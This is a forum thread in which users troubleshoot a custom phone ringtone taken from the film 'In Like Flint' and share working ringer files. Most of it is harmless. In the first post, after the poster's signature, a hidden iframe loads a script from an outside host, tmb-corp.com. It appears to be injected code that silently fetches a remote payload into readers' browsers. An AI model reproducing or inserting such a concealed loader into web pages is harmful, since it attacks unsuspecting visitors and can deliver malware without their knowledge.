+ Reply to Thread

Flint Phone Ringer

I have long searched for the telephone ringer from the old movie, "In Like Flint." Finally found the WAV file, successfully converted it to an MP3 file, then used the Ringer creator to turn it into a ringer database file.

But it does not work as my ringer.

Any suggestions? File is attached. . .

Dave<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files

Re: Flint Phone Ringer

Originally posted by dmcclure
    I have long searched for the telephone ringer from the old movie, "In Like Flint." Finally found the WAV file, successfully converted it to an MP3 file, then used the Ringer creator to turn it into a ringer database file.

But it does not work as my ringer.

Any suggestions? File is attached. . .

Dave
    When you install new ringtones, you need to do a soft reset before the new ringtones will show up in your available list of ringtone choices.
    Dave

Flint Phone Ringer

Yes, I did the soft reset, and it came up in my list. But when I select it, no sound is heard. A test phone call to my phone likewise yielded no ringtone.

Dave

I have the same results when I use your file. I tried making a ringer from the mp3 you provided and it still didn't work.

HOWEVER...a search using "Flint" turned up two results. Use the one entitled Austin Powers and then download the file posted by Priapism on 1/17/03. I have been using that ringer for weeks with NO PROBLEMS!

The first post called AustinPowers.mp3 didn't work as well and clipped out when receiving a call.

Just figured out how to attach a file!!!

Try this:
    Attached Files
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Ah, that's very nice. Thank you so much for your effort in this. I am appreciative. . .

Dave

Flint Ringer

You are very welcome, Dave!

The real credit goes to Priapism for taking a good mp3 and turning it into a really good, functional ringer.

All I did was follow Alanb's mantra..."Use the search function".

Hope you enjoy the new ringer...it ALWAYS turns heads!!!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

funny

not important but it is funny how i posted the first ourman flint ring tone and it got removed and some other dude is now taking credit for it..
    i love geeks